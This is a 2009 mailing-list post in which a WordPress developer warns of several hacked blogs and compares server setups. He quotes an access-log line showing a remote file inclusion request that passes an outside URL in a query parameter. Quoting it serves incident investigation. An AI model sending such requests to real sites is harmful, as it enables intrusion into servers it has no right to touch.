[wp-hackers] Hacked blogs
Joost de Valk
joost at yoast.com
Thu Mar 26 13:06:18 GMT 2009
Peter van der Does wrote:
> On Thu, 26 Mar 2009 13:12:44 +0100
> Joost de Valk<joost at yoast.com> wrote:
>
>
>> Hey guys,
>>
>> I've been restoring 5 hacked blogs the last few days, all running
>> 2.7.1 but spread over different hosts, can't find the hole yet that
>> they're getting in through, but I'd thought I'd send out a warning to
>> all of you that something seems to be wrong...
>>
>> Best,
>> Joost
>>
>>
> Do you have more info about the similarities of the blogs, like themes
> and plugins?
> Maybe even PHP, Webserver and MySQL versions?
>
>
No similarities there, PHP4 and 5, MySQL 4 and 5, Apache 2.0.54, 2.2 etc....
Files like this:
http://oursoultvxq.com/bbs/data/vip/id.txt
Show up in the access logs in some cases though:
84.40.23.30 - - [22/Mar/2009:18:04:33 +0100] "GET
/boek/?op=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 200
23128 "-" "libwww-perl/5.79"
Best,
Joost
More information about the wp-hackers
mailing list